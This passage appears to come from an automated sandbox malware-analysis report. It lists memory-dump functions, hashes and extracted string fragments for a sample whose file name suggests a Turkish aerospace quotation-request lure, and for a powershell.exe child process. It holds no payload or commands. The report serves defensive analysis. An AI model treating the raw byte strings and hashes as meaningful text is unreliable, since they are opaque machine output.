Opcode Fuzzy Hash: 597589a25502789389f770df1b97bc5dcd92cadae7579b90df253b5c8ac08e87
Instruction Fuzzy Hash: E2A19132E002098FCF05EFB4C89459EFBB2FF85354B15866AE905AB265DB31D916CF40

Function 0563EFDF Relevance: .3, Instructions: 263COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2185943190.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5630000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cee5a29d7a0017dcdda94518804456d32efad0d8b6c6f29bf84f2d7a5ebd3ad9
Instruction ID: 6b2c6036dc22b48b093da1d9f92c3523b9532bfbf9e9a000b34a961fda80b2fa
Opcode Fuzzy Hash: cee5a29d7a0017dcdda94518804456d32efad0d8b6c6f29bf84f2d7a5ebd3ad9
Instruction Fuzzy Hash: D0D1D331C2075ACACB15EF64D890AADB771FF95300F5097AAE5093B220EB746AD4CF91

Function 056302C8 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2185943190.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5630000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27332759bb888ed559ffecdcc9d694645e06f03712fbadcd8f9bbad86f70d844
Instruction ID: 1b1010f7d65b5290de9dc216bf03f0c10b6924816637082960b8bffc2ab5a06f
Opcode Fuzzy Hash: 27332759bb888ed559ffecdcc9d694645e06f03712fbadcd8f9bbad86f70d844
Instruction Fuzzy Hash: 6EC12AF0D8574D8AD752DF65E888189BBB2BB88395FD04B09D1622B2D0DBBC106ACF44

Function 09165180 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2191472644.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9160000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80ff7c265c7d612572a6ae3c4c67cce9de5ff3f8a527fb7e67e43855bb87a20a
Instruction ID: 98fb132b99d3e5006ac7826549fd53481e8344edb86f3976928cd8fb400d6282
Opcode Fuzzy Hash: 80ff7c265c7d612572a6ae3c4c67cce9de5ff3f8a527fb7e67e43855bb87a20a
Instruction Fuzzy Hash: 5591F070E05219CFDB18CFA9D8847EEBBF6BF4A308F10906AE519A7261DB304995CF40

Function 09163F48 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2191472644.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9160000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 448fc378fd3b9add8909e2bd147e7d1e6ef61038e99d77ab406629039335fa7b
Instruction ID: 75b03ca5ffb596b5bb20f8244c74f5587ed913a640331445b5afb0935ac5280e
Opcode Fuzzy Hash: 448fc378fd3b9add8909e2bd147e7d1e6ef61038e99d77ab406629039335fa7b
Instruction Fuzzy Hash: FC713971A11209CFD749DF7AE84169ABFF2FBC4300F24D169D104AB264EFB85906CB91

Function 09163F70 Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2191472644.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9160000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c73aa4709a4c1bf5c98604976fc98b8079afd4c185e0fb2eb0507b152681b8d6
Instruction ID: 8322dba166a9e5004d4fff5dcd67d4beffa914b20eb06722fc93bda30f3c5394
Opcode Fuzzy Hash: c73aa4709a4c1bf5c98604976fc98b8079afd4c185e0fb2eb0507b152681b8d6
Instruction Fuzzy Hash: AF61F771A112098FD748EF7AE84169ABFF3FBC8304F14D569D104AB264EFB85906CB51

Analysis Process: powershell.exePID: 6184, Parent PID: 2248COMMON

Executed Functions

Function 008CB490 Relevance: 5.3, Strings: 4, Instructions: 258COMMON

Download Yara Rule

Strings

[gr^, xrefs: 008CB529
kUgr^, xrefs: 008CB770, 008CB775
{Ugr^, xrefs: 008CB738, 008CB73D
yty, xrefs: 008CB621

Memory Dump Source

Source File: 00000003.00000002.2190093134.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8c0000_powershell.jbxd

Similarity

API ID:
String ID: yty$kUgr^${Ugr^$[gr^
API String ID: 0-2817026511
Opcode ID: 20e244c56ba06c4acb29f8765012e3b88e37641b0fe54b224bffee7c49a9a9ae
Instruction ID: 020e854aa4bb21d8c60962967321d8b3ff0508905f443e01d5e6182cd40de866
Opcode Fuzzy Hash: 20e244c56ba06c4acb29f8765012e3b88e37641b0fe54b224bffee7c49a9a9ae
Instruction Fuzzy Hash: 67916170A01A599BDB19DBB588116AEBBB2EF84700B40891DD216EB780DF349A058BC6

Function 008CB4A0 Relevance: 5.3, Strings: 4, Instructions: 252COMMON

Download Yara Rule

Strings

[gr^, xrefs: 008CB529
kUgr^, xrefs: 008CB770, 008CB775
{Ugr^, xrefs: 008CB738, 008CB73D
yty, xrefs: 008CB621

Memory Dump Source

Source File: 00000003.00000002.2190093134.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8c0000_powershell.jbxd

Similarity

API ID:
String ID: yty$kUgr^${Ugr^$[gr^
API String ID: 0-2817026511
Opcode ID: 8fec3b4e753fb2f0ca37f261519c3244203a376ddecd4e0d0e00f778588ae55c
Instruction ID: 5c4fba4f1ed69893e5aa8cb7f0d9bee63125ea2eb3e5c7567537a531a0b347bc
Opcode Fuzzy Hash: 8fec3b4e753fb2f0ca37f261519c3244203a376ddecd4e0d0e00f778588ae55c
Instruction Fuzzy Hash: CB918370F01B599BDB19DBB488116AEBBB6EFC4700B40891DD216EB740DF349E058BC6

Function 06F02308 Relevance: 18.1, Strings: 14, Instructions: 631COMMON

Download Yara Rule

Strings

r]l, xrefs: 06F0254F
|,'k, xrefs: 06F025DB
pi%k, xrefs: 06F023A0
J^l, xrefs: 06F023C5
pi%k, xrefs: 06F023B0
J^l, xrefs: 06F023D1
pi%k, xrefs: 06F02582
J^l, xrefs: 06F0259E
r]l, xrefs: 06F02559
J^l, xrefs: 06F025EA
pi%k, xrefs: 06F02363
J^l, xrefs: 06F025F6
pi%k, xrefs: 06F02416
J^l, xrefs: 06F0237F

Memory Dump Source

Source File: 00000003.00000002.2204091271.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6f00000_powershell.jbxd

Similarity

API ID:
String ID: pi%k$pi%k$pi%k$pi%k$pi%k$|,'k$J^l$J^l$J^l$J^l$J^l$J^l$r]l$r]l
API String ID: 0-328776807
Opcode ID: 84c2fdf3b645ee406b813fd1b7188dc919585a42d45cebe1afa137df07d2014c
Instruction ID: 64aa7496333ad01462739fc41b88f9c8dde875ba69a48c22aebffbf8928a355d
Opcode Fuzzy Hash: 84c2fdf3b645ee406b813fd1b7188dc919585a42d45cebe1afa137df07d2014c
Instruction Fuzzy Hash: BE223736F00315DFFB558F68C85976ABBE2AF89210F14806AD905CB292DB31DE41D7B2

Function 008CE5C1 Relevance: 2.6, Strings: 2, Instructions: 120COMMON

Download Yara Rule

Strings

pi%k, xrefs: 008CE667
J^l, xrefs: 008CE6EA

Memory Dump Source

Source File: 00000003.00000002.2190093134.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8c0000_powershell.jbxd

Similarity

API ID:
String ID: pi%k$J^l
API String ID: 0-1106140993
Opcode ID: 0801b5dfd2621089f72ea4f26af721ac6cbde6bf6f19398183856ed071311f7a
Instruction ID: c41533d6938f0b6b1a81e6cd1b846df9248697ea60dd2b813e1de0ef34f78db9
Opcode Fuzzy Hash: 0801b5dfd2621089f72ea4f26af721ac6cbde6bf6f19398183856ed071311f7a
Instruction Fuzzy Hash: BA412570A052099FCB15DFA9D894A9DBFB2FF89300F1085ADD415EB391DB34AD09CB91

Function 008CE610 Relevance: 2.6, Strings: 2, Instructions: 107COMMON

Download Yara Rule

Strings

pi%k, xrefs: 008CE667
J^l, xrefs: 008CE6EA

Memory Dump Source

Source File: 00000003.00000002.2190093134.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8c0000_powershell.jbxd

Similarity

API ID:
String ID: pi%k$J^l
API String ID: 0-1106140993
Opcode ID: 45cd6192f197c8d1c86f429cb46eab93f84e074ba13f47a74bf5c2a081cf0e01
Instruction ID: b8f07d7ecb44262bcfab7bcb270ce567c393eb8e40799a9f3a053fcd500d6e1c
Opcode Fuzzy Hash: 45cd6192f197c8d1c86f429cb46eab93f84e074ba13f47a74bf5c2a081cf0e01
Instruction Fuzzy Hash: 81418870A042059FCB15DF69D894A9ABBF2FF89304F24826DD405EB791DB34AC09CB90

Function 008CE640 Relevance: 2.6, Strings: 2, Instructions: 83COMMON

Download Yara Rule

Strings

pi%k, xrefs: 008CE667
J^l, xrefs: 008CE6EA

Memory Dump Source

Source File: 00000003.00000002.2190093134.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8c0000_powershell.jbxd

Similarity

API ID:
String ID: pi%k$J^l
API String ID: 0-1106140993
Opcode ID: 4ec909871ebf55526616440f41ca53794c84edf0b6c3d89e32642b96f5bbc60b
Instruction ID: c080e9139b322dd8694c9f56a1a5cfb23207bfb7abb0b13854fda103c2bc9299
Opcode Fuzzy Hash: 4ec909871ebf55526616440f41ca53794c84edf0b6c3d89e32642b96f5bbc60b
Instruction Fuzzy Hash: 3A311570A006099BCB15DF69D994A9EBBF2FF88304F10862DE416E7390DB74AD09CB90

Function 008CBAC0 Relevance: 1.4, Strings: 1, Instructions: 177COMMON

Download Yara Rule

Strings

yty, xrefs: 008CBAF5

Memory Dump Source

Source File: 00000003.00000002.2190093134.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8c0000_powershell.jbxd

Similarity

API ID:
String ID: yty
API String ID: 0-3715558209
Opcode ID: 85cd24312f6a3a5968dbcae77ec9f803ad4f620e49038091c39d6bd5e51ea0ea
Instruction ID: 14480ab918a68464a63134322c004d71c75464c263383a87303c9e7e45415d61
Opcode Fuzzy Hash: 85cd24312f6a3a5968dbcae77ec9f803ad4f620e49038091c39d6bd5e51ea0ea
Instruction Fuzzy Hash: DB713471E00648DFCB14CFA9D485B9DBBF1FF88314F28816AE819AB251DB749845CB61

Function 008CBAD0 Relevance: 1.4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

Strings

yty, xrefs: 008CBAF5

Memory Dump Source

Source File: 00000003.00000002.2190093134.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8c0000_powershell.jbxd

Similarity

API ID:
String ID: yty
API String ID: 0-3715558209
Opcode ID: cd070d68fa280e3cbb7d3908d7ffb588913bb1e99d1c120b364e3e7d5500a2c8
Instruction ID: bd46c89459d90f6d7813eda880f32064698f2f9c9263450c074c663e9b522853
Opcode Fuzzy Hash: cd070d68fa280e3cbb7d3908d7ffb588913bb1e99d1c120b364e3e7d5500a2c8
Instruction Fuzzy Hash: 7761E071E00648DBCB14CFA9D585B9DBBF1FF88310F28812AE919AB361EB709D45CB51

Function 008CAFA8 Relevance: 1.3, Strings: 1, Instructions: 81COMMON

Download Yara Rule

Strings

yty, xrefs: 008CB012

Memory Dump Source

Source File: 00000003.00000002.2190093134.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8c0000_powershell.jbxd

Similarity

API ID:
String ID: yty
API String ID: 0-3715558209
Opcode ID: 6b4411e80693578a285a8112d26317c8d8cf1dedcf2ca1ec19f309d267600e0b
Instruction ID: 4c0d19c3bb46cf9078f0f6e04e43f71cd50c6743edf6ceaec165dd451b5ca7dd
Opcode Fuzzy Hash: 6b4411e80693578a285a8112d26317c8d8cf1dedcf2ca1ec19f309d267600e0b
Instruction Fuzzy Hash: A8219A75A046488FCB14DFAED440B9EBBF5EB88320F24842AE518E7340CB74A9058BA5

Function 008C93F8 Relevance: 1.3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

yty, xrefs: 008C9424

Memory Dump Source

Source File: 00000003.00000002.2190093134.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8c0000_powershell.jbxd

Similarity

API ID:
String ID: yty
API String ID: 0-3715558209
Opcode ID: b366044b6651b1ca31a4b3b840abef8608826fcc7e1d41d436a88996aa1d5cef
Instruction ID: e52c3c7dd95161aeeb0322de99d2ae1a13d5edee89111fdce7d95e0239f21f96
Opcode Fuzzy Hash: b366044b6651b1ca31a4b3b840abef8608826fcc7e1d41d436a88996aa1d5cef
Instruction Fuzzy Hash: C331CEB59017448EDB60CF6AD0887CAFBF6FF88320F28C05ED45DA7205D77494828B55

Function 008C9408 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

yty, xrefs: 008C9424

Memory Dump Source

Source File: 00000003.00000002.2190093134.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8c0000_powershell.jbxd

Similarity

API ID:
String ID: yty
API String ID: 0-3715558209
Opcode ID: 41a5d4a62c355691c24ab365061ce5af6bbaab777e58099cd5946cefcea221f1
Instruction ID: d777c1dbf639b740cd2b844310fe214522b4c0c3f8230e948d9c1ec60bdd84bf
Opcode Fuzzy Hash: 41a5d4a62c355691c24ab365061ce5af6bbaab777e58099cd5946cefcea221f1
Instruction Fuzzy Hash: 8C219CB09017448EDB64CF6AC08878AFBF6FF88320F28C05ED85D97205D774A881CB65

Function 008CC4D0 Relevance: 1.3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

Strings

Bgr^, xrefs: 008CC526

Memory Dump Source

Source File: 00000003.00000002.2190093134.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8c0000_powershell.jbxd

Similarity

API ID:
String ID: Bgr^
API String ID: 0-3828442079
Opcode ID: 5ee9003a7d4cf65645442df5affba3b409253e3999aca907a5530c0d25aa4998
Instruction ID: 067f9b16f8d830e0f72374a98c01fd1c7ec13fb60c64d15e9faf351864786735
Opcode Fuzzy Hash: 5ee9003a7d4cf65645442df5affba3b409253e3999aca907a5530c0d25aa4998
Instruction Fuzzy Hash: 66F02271205344AFC306AB29D85099AFFA6FFC2354B01897ED209CB711DF31AC0AC7A1

Function 008CDC90 Relevance: 1.3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

.gr^, xrefs: 008CDCC6

Memory Dump Source

Source File: 00000003.00000002.2190093134.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8c0000_powershell.jbxd

Similarity

API ID:
String ID: .gr^
API String ID: 0-2512464740
Opcode ID: 89d9c32f03c02565b6c3145e3fb506297ff29f9b19efc272aff5d204f0c331e0
Instruction ID: 7561fa04fe771a1fdea4eaac6a718e5a743b1f0c33b005373931b9e3b45c8d69
Opcode Fuzzy Hash: 89d9c32f03c02565b6c3145e3fb506297ff29f9b19efc272aff5d204f0c331e0
Instruction Fuzzy Hash: 21F0B431605754ABC712665EA810EAABB79EEC5371310007FE509C7201DB34D91587E2

Function 008CF7D0 Relevance: 1.3, Strings: 1, Instructions: 33COMMON

Download Yara Rule

Strings

yty, xrefs: 008CF7DF

Memory Dump Source

Source File: 00000003.00000002.2190093134.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8c0000_powershell.jbxd

Similarity

API ID:
String ID: yty
API String ID: 0-3715558209
Opcode ID: 38da79349476b3f4889b0005240c4eeb7276604e7201e754cfe8b62d49a43d2a
Instruction ID: e1fcbaccb090b578c8e248fedf9e3f8b9fe4735b5a84a4e2e87131977e8e05dc
Opcode Fuzzy Hash: 38da79349476b3f4889b0005240c4eeb7276604e7201e754cfe8b62d49a43d2a
Instruction Fuzzy Hash: 8701D271D1074ADBCB04CFE5C8446EDBBB1FF99310F20472AE015A6644EBB06685CB90

Function 008CC4E0 Relevance: 1.3, Strings: 1, Instructions: 32COMMON

Download Yara Rule

Strings

Bgr^, xrefs: 008CC526

Memory Dump Source

Source File: 00000003.00000002.2190093134.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8c0000_powershell.jbxd

Similarity

API ID:
String ID: Bgr^
API String ID: 0-3828442079
Opcode ID: 9af5e44285e5a5f7b8acbdcc7c3de644c377e5e806b40b1c21f3b26b08343c82
Instruction ID: 91c8eadb9d032a3b68ca48c64c391c0172ea627f81cfd23f7ddbb3bd41a657c3
Opcode Fuzzy Hash: 9af5e44285e5a5f7b8acbdcc7c3de644c377e5e806b40b1c21f3b26b08343c82
Instruction Fuzzy Hash: CEF082712006046BC305AA29D84095BFBA6FFC5355B008A3DE6099B751DE71AD0987E1

Function 008CDCA0 Relevance: 1.3, Strings: 1, Instructions: 23COMMON

Download Yara Rule

Strings

.gr^, xrefs: 008CDCC6

Memory Dump Source

Source File: 00000003.00000002.2190093134.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8c0000_powershell.jbxd

Similarity

API ID:
String ID: .gr^
API String ID: 0-2512464740
Opcode ID: 6b991f2e448211d7ac719e482d5932d0906924d7c207782bee085ae37cb8e1e1
Instruction ID: 67899b99f5019361d07436cc6c7642a989a1865f9c745b35dceea54325aa7ab7
Opcode Fuzzy Hash: 6b991f2e448211d7ac719e482d5932d0906924d7c207782bee085ae37cb8e1e1
Instruction Fuzzy Hash: 7BE08C31700B14578226A66EA80095FBAAAEBC4671310403EE519C7304DEB8DD0587D6

Function 06F03CE8 Relevance: .6, Instructions: 575COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2204091271.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6f00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0a64430b9e9b426876c64a9b2a29a5aaedd7c43c923d0fd046594a9e3267ad0
Instruction ID: 4bceb560ef93a638ef5fc0d16b039cd53472bcd5c3e728bdd4715242dac824d1
Opcode Fuzzy Hash: f0a64430b9e9b426876c64a9b2a29a5aaedd7c43c923d0fd046594a9e3267ad0
Instruction Fuzzy Hash: 56124432F04315DFEB658B78881076BBBE2AFD1210F14806ADA05DB2D2DB31DD46D7A2

Function 008CE7B8 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2190093134.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efc40ea39541dcb3880e24e3cab7ed98eb5d0afccf0db71d212fd4d066c6dbf6
Instruction ID: e6ca025cdb9bbc5924f4864708796f63f38b32ad5d29d8a58b0d3c1330543da1
Opcode Fuzzy Hash: efc40ea39541dcb3880e24e3cab7ed98eb5d0afccf0db71d212fd4d066c6dbf6
Instruction Fuzzy Hash: AB912A74B102288FCB14DF79D594A6EBBF6FF88710B15806AE906EB355DE70DC428B90

Function 008C29F0 Relevance: .2, Instructions: 209COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2190093134.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9c84714282817d606703c65e6165d61cdb84cd6a82d91544721e5e50af43344
Instruction ID: 3621a9fe21b8c6984d421b5112461c556fabf90a3d83af5c32f23b1ba90db6ff
Opcode Fuzzy Hash: c9c84714282817d606703c65e6165d61cdb84cd6a82d91544721e5e50af43344
Instruction Fuzzy Hash: D7914774A00609CFCB15CF5DC594AAEBBB1FF88310B248669D915EB3A5C735EC52CBA0

Function 008C7740 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2190093134.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f7ff3ab871d663c3fd59e46e363289eb79c060d5738a7629d26123ab4e88157
Instruction ID: c1d3aae287cb32d09e742180776900addfbd9a76fbda4c1ee05a4ac1b429431a
Opcode Fuzzy Hash: 1f7ff3ab871d663c3fd59e46e363289eb79c060d5738a7629d26123ab4e88157
Instruction Fuzzy Hash: 74519A313082059FD7059B69D854F2A7BEAFF88315B24847AE609DB351EB31DC02CBA0

Function 008CE421 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2190093134.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c6513dc554d6e5173c9f8c711ea9281904209044691617be0651044c76555cf
Instruction ID: c101b213d281ff836baf96df605f1b06c3ef2db0a7f905dc2b4af94432f8dfff
Opcode Fuzzy Hash: 1c6513dc554d6e5173c9f8c711ea9281904209044691617be0651044c76555cf
Instruction Fuzzy Hash: 5A514874700605DFCB14DBADD494E6ABBF6FF98314754846AE609CB355EB30EC018B91

Function 008CE430 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2190093134.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c28df608be81023440a68d2742d82c00814fc031be1d038177a9655640ddd557
Instruction ID: ca277679d8a33bccc2c834d8e4c7036d2eee4ec9a925aa9e4c34f91918f56154
Opcode Fuzzy Hash: c28df608be81023440a68d2742d82c00814fc031be1d038177a9655640ddd557
Instruction Fuzzy Hash: 6F4115B4700605DFCB14EBACD584E6ABBF6FF983147548469E60ACB355EB70EC018B91

Function 06F03CCD Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2204091271.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6f00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0987e23557c79e47dcac16eb791ec36be111458460cf2859fc490da9c5cefde8
Instruction ID: 7fb1d1a690d85257751b90c4626e5e7efab242422b6993ac7b777ac3634d8bab
Opcode Fuzzy Hash: 0987e23557c79e47dcac16eb791ec36be111458460cf2859fc490da9c5cefde8
Instruction Fuzzy Hash: 4B412673E01306DFEB618F288911A67BBA3AF80640B0581A6D9009F3D2D735ED49D7A2

Function 008C6FE0 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2190093134.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b822a1e0122bbf9ce62007c30722c5bc87ab3e955fdcdbfbde8be795e7a196f1
Instruction ID: 883c78ae7f8e11cdc4a1b05b19efd12a88f059b472b4d22a4bff490122017bd3
Opcode Fuzzy Hash: b822a1e0122bbf9ce62007c30722c5bc87ab3e955fdcdbfbde8be795e7a196f1
Instruction Fuzzy Hash: 63412734A046058FDB15DF68C468AAABBF2FF8A715F2540A9E402EB391CB35DD01CF61

Function 008C2B00 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2190093134.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6cc0084a155404d232eaa25c0533415e5b17ffdf24acf7bf25413ddf3ab9f52
Instruction ID: b0a700d77d0e8994cee9b999b22450a42649f59d59db65b64b6e03474517f67d
Opcode Fuzzy Hash: b6cc0084a155404d232eaa25c0533415e5b17ffdf24acf7bf25413ddf3ab9f52
Instruction Fuzzy Hash: E4411574A00609DFCB05CF59C598EAEBBB1FF48310B118269D915AB2A4C732FC51CBA0

Function 008CE46B Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2190093134.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f72adcf8a4ed956010cf47f8bff6c1bdaaf9b3656ab1c259d678b52683d84c03
Instruction ID: d33474d68fe33f6400b2eb55e468c73c719a19957f69999fa7f8cf71a8eea031
Opcode Fuzzy Hash: f72adcf8a4ed956010cf47f8bff6c1bdaaf9b3656ab1c259d678b52683d84c03
Instruction Fuzzy Hash: 6B4105B4700605DFCB14EBACD584E6ABBE6FF983147548469E60ACB355EB70EC018B91

Function 008CC398 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2190093134.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 949e19300086b4eb35d2cfeffa58ae4a0e55e1e0adeebb75d3fa4384f4a3de36
Instruction ID: a3e50e16f9706e37464fdd2a672d23243ee4a562d64c0a11e008370b4b02d7fe
Opcode Fuzzy Hash: 949e19300086b4eb35d2cfeffa58ae4a0e55e1e0adeebb75d3fa4384f4a3de36
Instruction Fuzzy Hash: E4315C35301601ABD709DB79E854B9ABBA6FBC4321F04852DE609CB3A1DFB5E805CB91

Function 008C6FD1 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2190093134.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8fbe4df624f5da4429974a47d90ce81c313a249d7bb60bef41aa2598bf570fb
Instruction ID: 8884575354d618af9d838f573ef0a067eabc971c40f7e9ed2d765b78386f64d5
Opcode Fuzzy Hash: e8fbe4df624f5da4429974a47d90ce81c313a249d7bb60bef41aa2598bf570fb
Instruction Fuzzy Hash: 9931D434A046058FCB14CB68C598AAABBF2FF89315F2590A8E446EB351DB71DC01DF61

Function 008CAE70 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2190093134.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc24f2bc436c8eff1f8556bdb8d93b657963ddb1f101a3fe211ca0905bde392c
Instruction ID: 81277a0afe35d9cfdca593d63df57390f96a82ddf2d198a1eccbcfa04837586c
